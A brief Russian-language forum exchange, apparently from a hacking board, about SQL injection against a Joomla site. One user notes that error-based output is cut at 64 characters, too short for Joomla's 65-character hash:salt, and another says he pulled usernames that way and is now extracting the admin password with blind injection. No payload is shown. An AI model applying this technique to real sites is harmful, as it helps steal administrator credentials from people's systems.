Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от Ereee
Ereee said:
UPD. При error-based, как известно, выводится 64 символов. А в joomla hash:salt имеет длину в 65 символов
Вот такая ирония, юзайте blind...
Я через еrror-based вывел имена, вот тебе блиндом кручу админский пасс
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид